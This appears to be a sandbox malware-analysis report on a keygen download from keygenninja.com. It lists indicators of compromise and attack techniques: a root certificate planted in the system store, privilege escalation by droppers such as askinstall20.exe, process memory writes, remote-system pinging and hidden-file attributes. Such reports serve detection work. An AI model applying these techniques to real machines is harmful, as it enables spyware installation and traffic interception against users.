Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry\DontShowMeThisDialogAgain	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\ClearBrowsingHistoryOnStart = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

keygen-step-2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

6348 PING.EXE
4692 PING.EXE
4176 PING.EXE
5156 PING.EXE
6260 PING.EXE

pid	process
6348	PING.EXE
4692	PING.EXE
4176	PING.EXE
5156	PING.EXE
6260	PING.EXE

Script User-Agent 13 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	227	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	233	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	453	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	796	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	817	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	888	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	228	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	457	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	719	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	727	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	884	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	885	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	890	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 46 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exesetups.tmpmultitimer.exechrome.exechrome.exevpn.tmpIBInstaller_97039.tmpchrome.exe

pid	process
2484	chrome.exe
2484	chrome.exe
896	chrome.exe
896	chrome.exe
4504	chrome.exe
4504	chrome.exe
3920	chrome.exe
3920	chrome.exe
4388	chrome.exe
4388	chrome.exe
4288	chrome.exe
4288	chrome.exe
4308	chrome.exe
4308	chrome.exe
4136	setups.tmp
4136	setups.tmp
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3904	multitimer.exe
3820	chrome.exe
3820	chrome.exe
204	chrome.exe
204	chrome.exe
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5160	vpn.tmp
5228	IBInstaller_97039.tmp
5228	IBInstaller_97039.tmp
5460	chrome.exe
5460	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

msinfo32.exe

pid process

852 msinfo32.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

MicrosoftEdgeCP.exe

pid process

4188 MicrosoftEdgeCP.exe
4188 MicrosoftEdgeCP.exe

pid	process
852	msinfo32.exe

pid	process
4188	MicrosoftEdgeCP.exe
4188	MicrosoftEdgeCP.exe

Suspicious use of AdjustPrivilegeToken 49 IoCs

Processes:

Setup.exeaskinstall20.exetaskkill.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdgeCP.exemultitimer.exevpn.tmp

description	pid	process
Token: SeDebugPrivilege	1484	Setup.exe
Token: SeCreateTokenPrivilege	4100	askinstall20.exe
Token: SeAssignPrimaryTokenPrivilege	4100	askinstall20.exe
Token: SeLockMemoryPrivilege	4100	askinstall20.exe
Token: SeIncreaseQuotaPrivilege	4100	askinstall20.exe
Token: SeMachineAccountPrivilege	4100	askinstall20.exe
Token: SeTcbPrivilege	4100	askinstall20.exe
Token: SeSecurityPrivilege	4100	askinstall20.exe
Token: SeTakeOwnershipPrivilege	4100	askinstall20.exe
Token: SeLoadDriverPrivilege	4100	askinstall20.exe
Token: SeSystemProfilePrivilege	4100	askinstall20.exe
Token: SeSystemtimePrivilege	4100	askinstall20.exe
Token: SeProfSingleProcessPrivilege	4100	askinstall20.exe
Token: SeIncBasePriorityPrivilege	4100	askinstall20.exe
Token: SeCreatePagefilePrivilege	4100	askinstall20.exe
Token: SeCreatePermanentPrivilege	4100	askinstall20.exe
Token: SeBackupPrivilege	4100	askinstall20.exe
Token: SeRestorePrivilege	4100	askinstall20.exe
Token: SeShutdownPrivilege	4100	askinstall20.exe
Token: SeDebugPrivilege	4100	askinstall20.exe
Token: SeAuditPrivilege	4100	askinstall20.exe
Token: SeSystemEnvironmentPrivilege	4100	askinstall20.exe
Token: SeChangeNotifyPrivilege	4100	askinstall20.exe
Token: SeRemoteShutdownPrivilege	4100	askinstall20.exe
Token: SeUndockPrivilege	4100	askinstall20.exe
Token: SeSyncAgentPrivilege	4100	askinstall20.exe
Token: SeEnableDelegationPrivilege	4100	askinstall20.exe
Token: SeManageVolumePrivilege	4100	askinstall20.exe
Token: SeImpersonatePrivilege	4100	askinstall20.exe
Token: SeCreateGlobalPrivilege	4100	askinstall20.exe
Token: 31	4100	askinstall20.exe
Token: 32	4100	askinstall20.exe
Token: 33	4100	askinstall20.exe
Token: 34	4100	askinstall20.exe
Token: 35	4100	askinstall20.exe
Token: SeDebugPrivilege	4444	taskkill.exe
Token: SeDebugPrivilege	3904	multitimer.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4368	MicrosoftEdgeCP.exe
Token: SeDebugPrivilege	4848	MicrosoftEdge.exe
Token: SeDebugPrivilege	4420	multitimer.exe
Token: SeDebugPrivilege	5160	vpn.tmp
Token: SeDebugPrivilege	5160	vpn.tmp

Suspicious use of FindShellTrayWindow 18 IoCs

Processes:

chrome.exechrome.exeSetup3310.tmpvpn.tmpc0kjmtsswjd.exeIBInstaller_97039.tmp

pid	process
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
896	chrome.exe
204	chrome.exe
5104	Setup3310.tmp
5160	vpn.tmp
5264	c0kjmtsswjd.exe
5228	IBInstaller_97039.tmp
204	chrome.exe

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

OpenWith.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

4996 OpenWith.exe
4996 OpenWith.exe
4996 OpenWith.exe
4848 MicrosoftEdge.exe
4188 MicrosoftEdgeCP.exe
4188 MicrosoftEdgeCP.exe

pid	process
4996	OpenWith.exe
4996	OpenWith.exe
4996	OpenWith.exe
4848	MicrosoftEdge.exe
4188	MicrosoftEdgeCP.exe
4188	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 896 wrote to memory of 2188	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 2188	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 3112	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 2484	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 2484	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe
PID 896 wrote to memory of 212	896	chrome.exe	chrome.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

6656 attrib.exe
8752 attrib.exe
7976 attrib.exe
9960 attrib.exe

pid	process
6656	attrib.exe
8752	attrib.exe
7976	attrib.exe
9960	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenninja.com/
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:896

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffa45116e00,0x7ffa45116e10,0x7ffa45116e20
2⤵
PID:2188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:2
2⤵
PID:3112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1664 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2484

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 /prefetch:8
2⤵
PID:212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
2⤵
PID:3512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
2⤵
PID:1520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
2⤵
PID:2092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
2⤵
PID:3820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
2⤵
PID:3764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3536 /prefetch:1
2⤵
PID:3760

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4440 /prefetch:8
2⤵
PID:4332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4504

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:8
2⤵
PID:4520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5568 /prefetch:8
2⤵
PID:4644

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,4924125587766285298,10804300586184168563,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5376 /prefetch:8
2⤵
PID:4668

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings
2⤵
PID:4684

C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x24c,0x250,0x254,0x228,0x258,0x7ff7dcd77740,0x7ff7dcd77750,0x7ff7dcd77760
3⤵
PID:4776

C:\Program Files\Google\Chrome\Application\chrome.exe
